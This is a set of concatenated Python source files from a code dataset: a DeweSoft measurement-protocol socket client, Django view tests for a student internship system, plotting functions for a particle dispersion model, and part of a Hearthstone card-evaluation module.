self._dewe_request_control_message(\"LISTUSEDCHS\")\n channels = list()\n for line in response:\n element = line.split(\"\\t\")\n if len(element) > 23:\n channel = (int(element[2]), element[3], float(element[23]))\n channels.append(channel)\n del channel\n return channels\n\n def dewe_prepare_transfer(self, channel_list):\n \"\"\"Transmit a list of channels, which you want to be automatically\n transmitted by DeweSoft.\n\n This function must be called before the `dewe_start_transfer()` is\n called to rightly configure the DeweSoft communication.\n\n Args:\n channel_list (list): List of channels names (order will be taken\n into account by transfering data values)This argument must be\n a list of string containing the names of the channels\n\n Example:\n [r'Power_AC_Netz/U_rms_L1',r'Power_AC_Netz/U_rms_L2',\n r'Power_AC_Netz/U_rms_L3']\n Raises:\n DeweNetClientException: If the channels can't be prepared\n \"\"\"\n request = \"/stx PREPARETRANSFER\\r\\n\"\n for channel in channel_list:\n request += \"ch {}\\r\\n\".format(self.available_channels[\n channel].channel_number)\n request += \"/etx\\r\\n\"\n\n response = self._dewe_request_control_message(request)[0]\n\n if not response.startswith(\"+OK\"):\n self._logger.debug(response)\n raise DeweNetClientException(\n \"dewe_prepare_transfer\",\n \"Can't prepare channels for transfer: '{}'\".format(response))\n\n def dewe_start_transfer(self, port_number):\n \"\"\"Start the transfer of values from DeweSoft to the\n DeweNetControllerServer\n\n Args:\n port_number (int): Port number of the client, which will be used\n from the `DeweNetControllerServer`\n Raises:\n DeweNetClientException: If the transfer can't be started\n \"\"\"\n response = self._dewe_request_control_message(\n \"STARTTRANSFER {}\".format(port_number))[0]\n\n if not response.startswith(\"+OK\"):\n raise DeweNetClientException(\n \"dewe_start_transfer\",\n \"Error setting mode of DeweSoft: '{}'\".format(response))\n\n def dewe_init_start_transfer(self, port_number, channel_list):\n \"\"\"Combination of the prepare_transfer and the start transfer command\n\n Args:\n port_number (int): Port number of the client, which will be used\n from the `DeweNetControllerServer`\n channel_list (list): List of channels names (order will be taken\n into account by transfering data values)This argument must be\n a list of string containing the names of the channels\n Raises:\n DeweNetClientException: If the transfer can't be started\n \"\"\"\n self.dewe_prepare_transfer(channel_list)\n self.dewe_start_transfer(port_number)\n\n def dewe_start_trigger_transfer(self, port_number):\n \"\"\"Start the data transfer and get the already last stored values from\n DeweSoft\n\n Args:\n port_number (int): Port number of the client, which will be used\n from the `DeweNetControllerServer`\n\n Raises:\n DeweNetClientException: If the transfer can't be started\n \"\"\"\n response = self._dewe_request_control_message(\n \"STARTTRIGTRANSFER \" + str(port_number))[0]\n\n if not response.startswith(\"+OK\"):\n raise DeweNetClientException(\n \"dewe_start_trigger_transfer\",\n \"Can't start trigger transfer: '{}'\".format(response))\n\n def dewe_stop_transfer(self):\n \"\"\"Stops an actual running transmission from DeweSoft\n\n Raises:\n DeweNetClientException: If the transfer can't be stopped\n \"\"\"\n response = self._dewe_request_control_message(\"STOPTRANSFER\")[0]\n\n if not response.startswith(\"+OK\"):\n raise DeweNetClientException(\n \"dewe_stop_transfer\",\n \"Error stopping transfer of DeweSoft: '{}'\".format(response))\n\n def _dewe_request_control_message(self, request):\n \"\"\"Sends a request to the Dewesoft and waits for a response.\n\n Args:\n request (str): Request string of the command for DeweSoft\n communication.\n Returns:\n str: Response message\n\n Raises:\n DeweNetClientException: If an error is occured during communication.\n \"\"\"\n if not request.endswith(\"\\r\\n\"):\n request = request + \"\\r\\n\"\n\n self._socket.sendall(request.encode())\n self._logger.debug(\"Request: '\" + request.replace(\"\\r\\n\", \"\") + \"'\")\n\n response = self._dewe_read_response()\n\n if not response:\n raise DeweNetClientException(\"dewe_request_control_message\",\n \"No response received from DeweSoft.\")\n\n self._logger.debug(\"Response: '{}'\".format(response))\n return response\n\n def _dewe_read_response(self):\n \"\"\"Read the Response of the DeweSoft message\n\n This function receives a single line response or a multiline response\n from DeweSoft\n\n Returns:\n str: Response message striped by end delimiter\n \"\"\"\n response = self._readlines()\n\n if response[0].startswith(\"+STX\"):\n while True:\n if response[-1].startswith(\"+ETX\"):\n return response[1:-1]\n response.extend(self._readlines())\n else: # single line response\n return response\n\n def _readlines(self, delimiter=\"\\r\\n\"):\n \"\"\"Read lines from socket.\n\n Args:\n delimiter (str): Delimiter of a line\n\n Returns:\n list: A list of lines with removed line delimiter\n \"\"\"\n eol = delimiter[-1:].encode() # last character\n\n buff = StringIO()\n while True:\n data = self._socket.recv(1024)\n buff.write(data.decode())\n if data.endswith(eol):\n break\n\n return_lines = buff.getvalue().splitlines()\n return [string.strip() for string in return_lines]\n\n def _dewe_get_bool_message(self, request):\n \"\"\"Read a bool value from DeweSoft.\n\n Args:\n request (str): Request that is sent.\n\n Returns:\n bool: Response as bool value\n\n Raises:\n DeweNetClientException: if an error during request occurs.\n \"\"\"\n response = self._dewe_request_control_message(request)[0]\n response = str(response)\n\n if isinstance(response, str) and response.startswith(\"+OK\"):\n response = response.split(\" \")\n return response[1].upper() == \"YES\"\n else:\n raise DeweNetClientException(\n 'get_bool_message',\n \"Error reading bool value from DeweSoft: '{}'\".format(response))\n","sub_path":"Lib/svpelab/dewenetcontroller/dewenet_client.py","file_name":"dewenet_client.py","file_ext":"py","file_size_in_byte":40318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"326059958","text":"##############################################################################\n#\n# OSIS stands for Open Student Information System. It's an application\n# designed to manage the core business of higher education institutions,\n# such as universities, faculties, institutes and professional schools.\n# The core business involves the administration of students, teachers,\n# courses, programs and so on.\n#\n# Copyright (C) 2015-2016 Université catholique de Louvain (http://www.uclouvain.be)\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# A copy of this license - GNU General Public License - is available\n# at the root of the source code of this program. If not,\n# see http://www.gnu.org/licenses/.\n#\n##############################################################################\nfrom django.test import TestCase, Client\n\nimport base.tests.models.test_student\nfrom django.contrib.auth.models import User, Permission\nfrom django.core.urlresolvers import reverse\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom internship.models import internship_student_information as mdl_student_information\nfrom internship.tests.models import test_internship_student_information\nfrom internship.tests.factories.cohort import CohortFactory\n\nclass TestResumeUrl(TestCase):\n def setUp(self):\n self.c = Client()\n self.student = base.tests.models.test_student.create_student(\"45451298\")\n self.user = User.objects.create_user('user', 'user@test.com', 'userpass')\n self.student.person.user = self.user\n self.student.person.save()\n self.cohort = CohortFactory()\n self.student_information = test_internship_student_information.create_student_information(self.user, self.cohort, self.student.person)\n add_permission(self.student.person.user, \"can_access_internship\")\n\n def test_can_access_student_resume(self):\n url = reverse(\"student_resume\", kwargs={'cohort_id': self.cohort.id})\n response = self.c.get(url)\n self.assertEqual(response.status_code, 302)\n\n self.c.force_login(self.user)\n response = self.c.get(url)\n self.assertEqual(response.status_code, 200)\n\n def test_can_access_student_info_modification(self):\n url = reverse(\"internship_student_edit\", kwargs={'cohort_id': self.cohort.id})\n response = self.c.get(url)\n self.assertEqual(response.status_code, 302)\n\n self.c.force_login(self.user)\n response = self.c.get(url)\n self.assertEqual(response.status_code, 200)\n\n\nclass TestEditStudentInformation(TestCase):\n def setUp(self):\n self.student = base.tests.models.test_student.create_student(\"45451298\")\n self.user = User.objects.create_user('user', 'user@test.com', 'userpass')\n self.student.person.user = self.user\n self.student.person.save()\n self.cohort = CohortFactory()\n self.student_information = test_internship_student_information.create_student_information(self.user, self.cohort, self.student.person)\n add_permission(self.student.person.user, \"can_access_internship\")\n self.c = Client()\n self.c.force_login(self.user)\n\n self.url = reverse(\"internship_student_edit\", kwargs={'cohort_id': self.cohort.id})\n\n self.data = {\n \"location\": \"location\",\n \"postal_code\": \"postal\",\n \"city\": \"city\",\n \"country\": \"country\",\n \"email\": \"test@test.com\",\n \"phone_mobile\": \"0236478987\",\n \"contest\": \"GENERALIST\",\n }\n\n def test_information_save(self):\n self.c.post(self.url, data=self.data)\n try:\n student_information = mdl_student_information.find_by_user_and_cohort(self.user, cohort=self.cohort)\n except ObjectDoesNotExist:\n self.fail()\n\n self.assertEqual(student_information.location, self.data[\"location\"])\n self.assertEqual(student_information.postal_code, self.data[\"postal_code\"])\n self.assertEqual(student_information.city, self.data[\"city\"])\n self.assertEqual(student_information.country, self.data[\"country\"])\n self.assertEqual(student_information.email, self.data[\"email\"])\n self.assertEqual(student_information.phone_mobile, self.data[\"phone_mobile\"])\n self.assertEqual(student_information.contest, self.data[\"contest\"])\n\n\ndef add_permission(user, codename):\n perm = get_permission(codename)\n user.user_permissions.add(perm)\n\n\ndef get_permission(codename):\n return Permission.objects.get(codename=codename)\n","sub_path":"internship/tests/views/test_resume.py","file_name":"test_resume.py","file_ext":"py","file_size_in_byte":5017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"526933232","text":"\"\"\"\nCreate plots of lpdm results.\n\"\"\"\n\n__all__ = (\n \"conc\",\n \"trajectories\",\n \"final_pos_hist\",\n \"final_pos_hist2d\",\n \"ws_hist_all\",\n \"final_pos_scatter\",\n)\n\nfrom itertools import cycle\n\nimport matplotlib as mpl\nfrom matplotlib.collections import LineCollection as _LineCollection\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D # noqa: F401 unused import\nimport numpy as np\nfrom scipy import stats\n\n# ^ could add `as _{}` to all of these\n# to indicate that these are not intended to be public parts of the module name space\n# since __all__ is not respected by linters or autocompleters\n\nfrom .chem import chemical_species_data\nfrom .utils import check_fig_num, to_sci_not, sec_to_str, moving_average, s_t_info\n\n\n# TODO: create some base classes for plots to reduce repeating of code\n# - allow passing fig and ax kwargs in __init__\n# - stars to mark sources; check_fig_num, labeling, etc.\n# - alpha calculation based on number of particles & spread?\n\n# TODO: really all plots could have the auto-bounds stuff. and (optionally?) print message about it?\n\n# TODO: probably should pass model object to the plotting functions, not separate state and p?\n\n\ndef final_pos_scatter(state, p, sdim=\"xy\"):\n \"\"\"Scatter plot of particle end positions.\"\"\"\n xpath = state[\"xp\"]\n ypath = state[\"yp\"]\n # zpath = state[\"zp\"]\n\n Np_tot = p[\"Np_tot\"]\n assert xpath.size == Np_tot\n\n if sdim in (\"xyz\", \"3d\", \"3-D\"):\n sdim = \"xyz\"\n x = state[\"xp\"]\n y = state[\"yp\"]\n z = state[\"zp\"]\n subplot_kw = {\"projection\": \"3d\"}\n coords = (x, y, z)\n plot_kw = dict(alpha=0.5, mew=0, ms=7)\n elif len(sdim) == 2 and all(sdim_ in (\"x\", \"y\", \"z\") for sdim_ in sdim):\n x = state[f\"{sdim[0]}p\"]\n y = state[f\"{sdim[1]}p\"]\n subplot_kw = {}\n coords = (x, y)\n plot_kw = dict(alpha=0.5, mfc=\"none\", mew=0.8, ms=5)\n else:\n raise ValueError(\"invalid choice of `sdim`\")\n\n dim = list(sdim)\n\n num = check_fig_num(f\"final-pos-scatter-{sdim}\")\n fig, ax = plt.subplots(num=num, subplot_kw=subplot_kw)\n\n ax.plot(*coords, \"o\", **plot_kw)\n\n ax.set_xlabel(f\"${dim[0]}$\")\n ax.set_ylabel(f\"${dim[1]}$\")\n if subplot_kw:\n ax.set_zlabel(f\"${dim[2]}$\")\n ax.set_title(s_t_info(p), loc=\"left\")\n ax.set_title(f\"$N_p = {Np_tot}$\", loc=\"right\")\n\n # TODO: should make fn for this\n for (xs, ys) in p[\"source_positions\"]:\n sp = dict(x=xs, y=ys, z=p[\"release_height\"])\n if subplot_kw: # hack for now\n ax.plot([sp[dim[0]]], [sp[dim[1]]], [sp[dim[2]]], \"*\", c=\"gold\", ms=10)\n else:\n ax.plot(sp[dim[0]], sp[dim[1]], \"*\", c=\"gold\", ms=10)\n\n fig.tight_layout()\n\n\n# TODO: add option to do trajectories for continuous release runs, colored by time out\n# TODO: trajectories for hist run in 3-D?\n\n\ndef trajectories(hist, p, *, smooth=False, smooth_window_size=None, color_sources=False):\n \"\"\"Particle trajectories.\n\n note: intended to be used for a single-release run\n \"\"\"\n pos = hist[\"pos\"]\n\n t_tot = p[\"t_tot\"]\n # dt = p[\"dt\"]\n dt = p[\"dt_out\"] # use dt from hist, not model integration; TODO: indicate this in the plot?\n N_t = p[\"N_t\"]\n Np = p[\"Np_tot\"]\n N = Np * N_t\n assert pos.shape[0] == Np\n\n ltitle = s_t_info(p)\n rtitle = f\"$N_p = {to_sci_not(Np)}$\\n$N = {to_sci_not(N)}$\"\n\n # allow specifying smooth_window_size only\n if smooth_window_size is not None and not smooth:\n smooth = True\n if smooth:\n if smooth_window_size is None:\n n = 100\n else:\n n = int(smooth_window_size)\n\n if n * dt > 0.5 * t_tot:\n raise ValueError(\n \"can't do any smoothing with the requested window size (not enough points)\"\n )\n pos0 = pos[:, 0, :][:, np.newaxis, :]\n pos = np.swapaxes(moving_average(np.swapaxes(pos, 0, 1), n=n, axis=0), 0, 1)\n # ^ `np.swapaxes` should return views, not create new arrays (ver >= 1.10.0)\n\n # preserve starting point\n pos = np.concatenate((pos0, pos), axis=1) # axis=1 => basically `hstack`\n\n ltitle = f\"$N_{{smooth}} = {n}$ ({n*dt:} s)\\n{ltitle}\" # add smoothing info to left title\n\n num = check_fig_num(\"trajectories\")\n fig, ax = plt.subplots(num=num)\n\n if color_sources:\n if isinstance(color_sources, (list, np.ndarray)):\n colors = color_sources # assume is a list of colors (TODO: should check)\n else:\n colors = plt.get_cmap(\"Dark2\").colors\n # Dark2 is a ListedColormap with 8 colors; `plt.cm.Dark2` same but pylint complains plt.cm `no-member` Dark2\n\n N_sources = p[\"N_sources\"]\n for j, color in zip(range(N_sources), cycle(colors)):\n segs = [pos[i, :, :2] for i in range(j, Np, N_sources) for j in range(N_sources)]\n\n lc = _LineCollection(segs, linewidths=0.5, colors=color, linestyles=\"solid\", alpha=0.3,)\n ax.add_collection(lc)\n\n else:\n segs = [pos[i, :, :2] for i in range(Np)]\n\n lc = _LineCollection(segs, linewidths=0.5, colors=\"0.6\", linestyles=\"solid\", alpha=0.5,)\n ax.add_collection(lc)\n\n for (x, y) in p[\"source_positions\"]:\n ax.plot(x, y, \"*\", c=\"gold\", ms=10)\n\n ax.autoscale() # `ax.add_collection` won't do this automatically\n\n ax.set_xlabel(\"x\")\n ax.set_ylabel(\"y\")\n ax.set_title(ltitle, loc=\"left\")\n ax.set_title(rtitle, loc=\"right\")\n\n fig.tight_layout()\n\n\n# TODO: much final_pos_hist2d code is repeated here in conc\n\n\ndef conc(\n state,\n p,\n spc=\"bocimene\", # species to plot: dict key, not display name\n *,\n plot_type=\"scatter\",\n bins=(20, 10),\n levels=30,\n cmap=\"gnuplot\",\n log_cnorm=False, # change to `log_scale` to make more sense with centerline?\n vmax=100,\n vmin=None, # allow fair comparison with other plots\n centerline_dy=10, # width of y bin for centerline plots\n):\n \"\"\"Scatter plot of particle end positions colored by concentration\n for continuous release runs\n\n INPUTS\n ------\n spc : str\n species dict key (ASCII format), e.g., 'bocimene'\n or\n 'all' (only for `plot_type='centerline'`)\n\n INPUTS (optional)\n ------\n plot_type : str {'scatter', 'pcolor', 'contourf', 'centerline'}\n\n \"\"\"\n xpath = state[\"xp\"]\n ypath = state[\"yp\"]\n zpath = state[\"zp\"]\n\n X = xpath\n Y = ypath\n Z = zpath\n\n if plot_type in (\"scatter\", \"pcolor\", \"contourf\"):\n conc = state[\"conc\"][spc]\n spc_display_name = chemical_species_data[spc][\"display_name\"]\n\n num = check_fig_num(f\"horizontal-end-positions-with-conc_{spc}_{plot_type}\")\n fig, ax = plt.subplots(num=num)\n\n if plot_type == \"scatter\":\n im = ax.scatter(\n X, Y, c=conc, s=7, marker=\"o\", alpha=0.4, linewidths=0, cmap=cmap, vmin=vmin, vmax=vmax\n )\n # default `s` is 6**2 (default lines.markersize squared)\n # TODO: marker size should be calculated dynamically but also allowed to pass!\n elif plot_type in (\"pcolor\", \"contourf\"):\n # binned conc. of floral volatiles depends on both the particle concentration (the passive scalars)\n # and chemical destruction due to oxidation\n\n # TODO: copied this from the hist2d fn for now. should make a fn to do this...\n if not bins:\n bins = 50\n elif bins == \"auto\":\n Np = p[\"Np_tot\"]\n xbar, xstd = X.mean(), X.std()\n ybar, ystd = Y.mean(), Y.std()\n mult = 2.0\n nx = min(np.sqrt(Np).astype(int), 100)\n ny = nx\n x_edges = np.linspace(xbar - mult * xstd, xbar + mult * xstd, nx + 1)\n y_edges = np.linspace(ybar - mult * ystd, ybar + mult * ystd, ny + 1)\n bins = [x_edges, y_edges]\n # TODO: fix so that for z we don't go below zero (or just a bit)\n # else:\n # bins = np.linspace(bounds[0], bounds[1], 50)\n\n # 1. concentration of lpd particles\n H, xedges, yedges = np.histogram2d(X, Y, bins=bins) # H is binned particle count\n conc_p_rel = (H / H.max()).T # TODO: really should divide by level at source (closest bin?)\n\n # 2. chemistry\n ret = stats.binned_statistic_2d(X, Y, conc, statistic=\"mean\", bins=bins)\n conc_c = ret.statistic.T # it is returned with dim (nx, ny), we need y to be rows (dim 0)\n x = ret.x_edge\n y = ret.y_edge\n # ^ these are cell edges\n xc = x[:-1] + 0.5 * np.diff(x)\n yc = y[:-1] + 0.5 * np.diff(y)\n # ^ these are cell centers\n\n assert np.allclose(x, xedges)\n assert np.allclose(y, yedges)\n # TODO: find a way to not hist by x,y more than once (here we have done it 2x)\n\n z = conc_p_rel * conc_c\n\n # copied from hist2d\n if log_cnorm:\n norm = mpl.colors.LogNorm(vmin=vmin, vmax=vmax)\n\n # https://matplotlib.org/3.1.3/gallery/images_contours_and_fields/contourf_log.html\n # https://matplotlib.org/3.1.3/api/ticker_api.html#matplotlib.ticker.LogLocator\n # locator = mpl.ticker.LogLocator(subs=(0.25, 0.5, 1.0)) # another way to get more levels in between powers of 10\n nlevels = levels if isinstance(levels, int) else np.asarray(levels).size\n locator = mpl.ticker.LogLocator(subs=\"all\", numticks=nlevels)\n # TODO: although this^ works, the ticks are not all getting labeled. need to fix.\n\n else:\n norm = mpl.colors.Normalize(vmin=vmin, vmax=vmax)\n locator = None\n\n if plot_type == \"pcolor\":\n im = ax.pcolormesh(x, y, z, cmap=cmap, norm=norm)\n elif plot_type == \"contourf\":\n im = ax.contourf(xc, yc, z, levels, cmap=cmap, norm=norm, locator=locator)\n\n ax.set_xlim((x[0], x[-1]))\n ax.set_ylim((y[0], y[-1]))\n\n elif plot_type == \"centerline\":\n # raise NotImplementedError(\"Yo\")\n if spc == \"all\":\n spc_to_plot = state[\"conc\"].keys()\n n_sp = len(p[\"source_positions\"])\n plt.close(fig)\n fig, axs = plt.subplots(n_sp, 1, num=num)\n ax = axs.flat[0]\n else:\n spc_to_plot = [spc]\n\n # add subplots if necessary (one for each source pos)\n # axs = []\n # for i, source_pos in enumerate(p[\"source_positions\"]):\n # if i == 0:\n # ax_ = ax\n # else:\n # ax_ = fig.add_subplot(len(p[\"source_positions\"]), 1, i+1, sharex=ax)\n # axs.append(ax_)\n\n for spc in spc_to_plot:\n conc = state[\"conc\"][spc]\n\n for i, source_pos in enumerate(p[\"source_positions\"]):\n\n ax_ = axs.flat[i]\n\n x0_source, y0_source = source_pos\n\n # only one bin in y\n dy = centerline_dy\n y_edges = np.r_[y0_source - 0.5 * dy, y0_source + 0.5 * dy]\n\n # TODO: binning and such copied from 2d plot part. needs DRYing\n\n # x bins same as the 2d plots\n # if bins == \"auto\":\n Np = p[\"Np_tot\"]\n xbar, xstd = X.mean(), X.std()\n mult = 2.0\n nx = min(np.sqrt(Np).astype(int), 100)\n x_edges = np.linspace(xbar - mult * xstd, xbar + mult * xstd, nx + 1)\n # elif isinstance(bins, int):\n\n bins = [x_edges, y_edges]\n\n # 1. concentration of lpd particles\n H, xedges, yedges = np.histogram2d(X, Y, bins=bins) # H is binned particle count\n conc_p_rel = (H / H.max()).T\n\n # 2. chemistry\n ret = stats.binned_statistic_2d(X, Y, conc, statistic=\"mean\", bins=bins)\n conc_c = ret.statistic.T\n x = ret.x_edge\n y = ret.y_edge\n # ^ these are cell edges\n xc = x[:-1] + 0.5 * np.diff(x)\n yc = y[:-1] + 0.5 * np.diff(y)\n # ^ these are cell centers\n\n # seems to be dominated by particle dispersion\n # investigating here:\n # z = (conc_p_rel).squeeze()\n # z = (conc_c).squeeze()\n z = (conc_p_rel * conc_c).squeeze()\n\n # hack for now\n # label = spc if i == 0 else None\n label = chemical_species_data[spc][\"display_name\"] if i == 0 else None\n\n ax_.plot(xc, z, \"-\", label=label)\n\n if log_cnorm:\n ax_.set_yscale(\"log\")\n\n ax_.set_xlabel(\"x\")\n ax_.set_ylabel(\"y\")\n ax_.set_title(f\"y = {y0_source}\")\n\n else:\n raise ValueError(\"invalid `plot_type`\")\n\n if plot_type in (\"scatter\", \"pcolor\", \"contourf\"):\n cb = fig.colorbar(im, drawedges=False)\n cb.set_label(f\"{spc_display_name} relative conc. (%)\")\n\n for (x, y) in p[\"source_positions\"]:\n ax.plot(x, y, \"*\", c=\"gold\", ms=11, mec=\"0.35\", mew=1.0)\n\n ax.set_xlabel(\"x\")\n ax.set_ylabel(\"y\")\n\n elif plot_type == \"centerline\":\n # pass\n # ax.legend()\n fig.legend(ncol=2, fontsize=\"small\")\n\n ax.set_title(s_t_info(p), loc=\"left\")\n\n fig.set_tight_layout(True)\n # fig.tight_layout()\n\n\n# TODO: x-y (or u-v) hists for different height (z) bins\n\n\ndef ws_hist_all(\n hist, p, *, bounds=False,\n):\n \"\"\"Histograms of particle wind speed components\n from a single-release run.\n \"\"\"\n\n ws = hist[\"ws\"]\n u_all = np.ravel(ws[:, :, 0])\n v_all = np.ravel(ws[:, :, 1])\n w_all = np.ravel(ws[:, :, 2])\n\n num = check_fig_num(\"ws-hist-all\")\n fig, axs = plt.subplots(3, 1, num=num, sharex=True)\n\n if not bounds:\n bins = 100\n else:\n bins = np.linspace(bounds[0], bounds[1], 100)\n\n labels = [\"$u$\", \"$v$\", \"$w$\"]\n for i, (ui, ax) in enumerate(zip([u_all, v_all, w_all], axs.flat)):\n ax.hist(ui, bins)\n ax.text(0.01, 0.98, labels[i], va=\"top\", ha=\"left\", fontsize=13, transform=ax.transAxes)\n\n if bounds:\n axs[0].set_xlim(bounds)\n\n axs[0].set_title(s_t_info(p), loc=\"left\")\n Np, Nt = p[\"Np_tot\"], p[\"N_t\"]\n N = Np * Nt\n axs[0].set_title(f\"$N_p = {to_sci_not(Np)}$\\n$N = {to_sci_not(N)}$\", loc=\"right\")\n\n fig.tight_layout()\n\n # return\n\n\ndef final_pos_hist(\n state, p, *, bounds=False,\n):\n \"\"\"Histograms of final position components.\"\"\"\n\n xf = state[\"xp\"]\n yf = state[\"yp\"]\n zf = state[\"zp\"]\n\n num = check_fig_num(\"final-pos-hist\")\n fig, axs = plt.subplots(3, 1, num=num, sharex=True)\n\n if not bounds:\n bins = 100\n else:\n bins = np.linspace(bounds[0], bounds[1], 100)\n\n labels = [\"$x$\", \"$y$\", \"$z$\"]\n for i, (xi, ax) in enumerate(zip([xf, yf, zf], axs.flat)):\n ax.hist(xi, bins)\n ax.text(0.01, 0.98, labels[i], va=\"top\", ha=\"left\", fontsize=13, transform=ax.transAxes)\n\n if bounds:\n axs[0].set_xlim(bounds)\n\n axs[0].set_title(s_t_info(p), loc=\"left\")\n\n fig.tight_layout()\n\n\ndef final_pos_hist2d(\n state, p, *, dim=(\"x\", \"y\"), bounds=False, create_contourf=False, log_cnorm=False,\n):\n \"\"\"2-D histogram of selected final position components.\"\"\"\n\n x = state[f\"{dim[0]}p\"]\n y = state[f\"{dim[1]}p\"]\n\n Np = x.size\n\n if len(dim) != 2 or any(dim_ not in (\"x\", \"y\", \"z\") for dim_ in dim):\n raise ValueError\n sdim = \"-\".join(dim)\n\n # TODO: match style of final_pos_scatter, like 'xy', not 'x-y'\n num = check_fig_num(f\"final-pos-hist-{sdim}\")\n fig, ax = plt.subplots(num=num)\n\n if not bounds:\n bins = 50\n elif bounds == \"auto\":\n xbar, xstd = x.mean(), x.std()\n ybar, ystd = y.mean(), y.std()\n mult = 2.0\n nx = min(np.sqrt(Np).astype(int), 100)\n ny = nx\n x_edges = np.linspace(xbar - mult * xstd, xbar + mult * xstd, nx + 1)\n y_edges = np.linspace(ybar - mult * ystd, ybar + mult * ystd, ny + 1)\n bins = [x_edges, y_edges]\n # TODO: fix so that for z we don't go below zero (or just a bit)\n else:\n bins = np.linspace(bounds[0], bounds[1], 50)\n\n # H, xedges, yedges = np.histogram2d(x, y, bins=bins)\n\n if log_cnorm:\n norm = mpl.colors.LogNorm(vmin=1.0)\n else:\n norm = mpl.colors.Normalize(vmin=1.0)\n\n H, xedges, yedges, im = ax.hist2d(x, y, bins=bins, norm=norm)\n # ^ returns h (nx, ny), xedges, yedges, image\n\n cb = plt.colorbar(im)\n\n ax.set_xlabel(f\"${dim[0]}$\")\n ax.set_ylabel(f\"${dim[1]}$\")\n\n ax.set_xlim((xedges[0], xedges[-1]))\n ax.set_ylim((yedges[0], yedges[-1]))\n ax.set_title(s_t_info(p), loc=\"left\")\n\n for (x, y) in p[\"source_positions\"]:\n ax.plot(x, y, \"*\", c=\"gold\", ms=11, mec=\"0.35\", mew=1.0)\n\n fig.tight_layout()\n\n if create_contourf:\n num = check_fig_num(f\"final-pos-hist-{sdim}-contourf\")\n fig2, ax = plt.subplots(num=num)\n\n levels = np.arange(1, H.max() + 1, 1) # TODO: should adjust for log cnorm\n xc = xedges[:-1] + np.diff(xedges)\n yc = yedges[:-1] + np.diff(yedges)\n cs = ax.contourf(\n xc,\n yc,\n H.T,\n levels=levels,\n norm=norm,\n # extend='max'\n )\n\n cb = plt.colorbar(cs)\n cs.cmap.set_under(\"white\")\n cs.changed()\n\n ax.set_xlabel(f\"${dim[0]}$\")\n ax.set_ylabel(f\"${dim[1]}$\")\n ax.set_title(s_t_info(p), loc=\"left\")\n\n ax.set_xlim((xedges[0], xedges[-1]))\n ax.set_ylim((yedges[0], yedges[-1]))\n\n for (x, y) in p[\"source_positions\"]:\n ax.plot(x, y, \"*\", c=\"gold\", ms=11, mec=\"0.35\", mew=1.0)\n\n fig2.tight_layout()\n","sub_path":"blpdm/plots.py","file_name":"plots.py","file_ext":"py","file_size_in_byte":17686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"203918477","text":"from tables import Enum\nfrom types import IntType\nfrom Board import isMyCard, Zone, getMyCards,\\\n getEnemyCards, getMyHero, getMyMinionCount, getEnemyMinionCount, getMyHandcardCount,\\\n E_HERO, getCardByIngameId\nfrom Util_new import split, Cardtype, Effectivness, ThreatLvl\n\nclass Target(Enum):\n MINION = 'a minion'\n HERO = 'your hero'\n RANDOM = 'random' \n E_HERO = 'enemy hero'\n E_MINIONS = 'all enemy minions'\n ALL = 'all characters'\n CHARACTER = 'character'\n ENEMIES = 'all enemies'\n OTHER = 'all other characters'\n MINIONS = 'all minions'\n HEROS = 'each hero'\n E_CHARACTER = 'enemy character'\n UNDAMAGED_MINION = 'undamaged minion'\n ADJACENT = 'adjacent'\n FRIEND_CHAR = 'friendly characters'\n FRIEND_MIN = 'friendly minions'\n\nclass Effect(Enum):\n DMG = 0\n RES = 1\n \ndef EnemyAttackPower():\n dmg = 0\n for c in getEnemyCards().values():\n if c.compareZone(Zone.PLAY):\n if c.compareCardtype(Cardtype.MINION) or c.compareCardtype(Cardtype.WEAPON):\n dmg = dmg + c.getAttack()\n return dmg\n \ndef MinionDmg():\n dmg = 0 \n for c in getMyCards().values():\n if c._zone == Zone.PLAY:\n if c.mayAttack():\n if c._cardtype == Cardtype.MINION or (c._cardtype == Cardtype.HERO and c._attack > 0) or (c._cardtype == Cardtype.WEAPON): \n dmg = dmg + c.getAttack()\n return dmg\n\ndef effectivnessDmg(target, value):\n if isMyCard(target._ingameID):\n if target._cardtype == Cardtype.MINION:\n if target._divineShield:\n return Effectivness.LOW\n if target.getDamage() + value >= target._health:\n return Effectivness.BAD\n if target._cardtype == Cardtype.HERO:\n if target._armor > value:\n Effectivness.LOW\n if target._armor < value:\n if target._getDamage()+value >= target._health:\n Effectivness.WORSE\n else:\n Effectivness.BAD\n else:\n if target._cardtype == Cardtype.MINION:\n if target._divineShield:\n return Effectivness.LOW\n if target.getDamage() + value >= target._health:\n return Effectivness.GOOD\n if target._cardtype == Cardtype.HERO:\n if target._armor > value:\n Effectivness.LOW\n if target._armor < value:\n if target.getDamage()+value >= target._health:\n Effectivness.GREAT\n else:\n Effectivness.GOOD\n \ndef effectivnessRes(target, value):\n dmg = target.getDamage()\n hlt = target.getHealth()\n resPercental = (dmg - value)/hlt \n if isMyCard(target._id):\n if resPercental >= 1:\n return Effectivness.GREAT\n else:\n return Effectivness.GOOD\n else:\n if resPercental >= 1:\n return Effectivness.WORSE\n elif resPercental > 0.5:\n return Effectivness.BAD\n else:\n return Effectivness.LOW\n \ndef effectivenessTrans(target, atk, health):\n if isMyCard(target._ingameID):\n if target.getHealth() > health or target.getAttack() > atk:\n return Effectivness.GOOD\n else:\n return Effectivness.WORSE\n else:\n if target.getHealth() < health or target.getAttack() < atk:\n return Effectivness.GOOD\n else:\n return Effectivness.WORSE\n \ndef effectivnessGain(txt):\n if 'this turn':\n return Effectivness.GOOD\n else:\n return Effectivness.GREAT\n \ndef effectivnessRet(target):\n if isMyCard(target._ingameID):\n if target.getDamage()/target.getHealth() <= 0.5 and target._charge == True:\n return Effectivness.GREAT\n elif target.getDamage()/target.getHealth() <= 0.5:\n return Effectivness.GOOD\n elif target._charge == True:\n return Effectivness.GOOD\n else:\n if target._getAttack >= 4:\n return Effectivness.GOOD\n else:\n return Effectivness.LOW\n #vielleicht 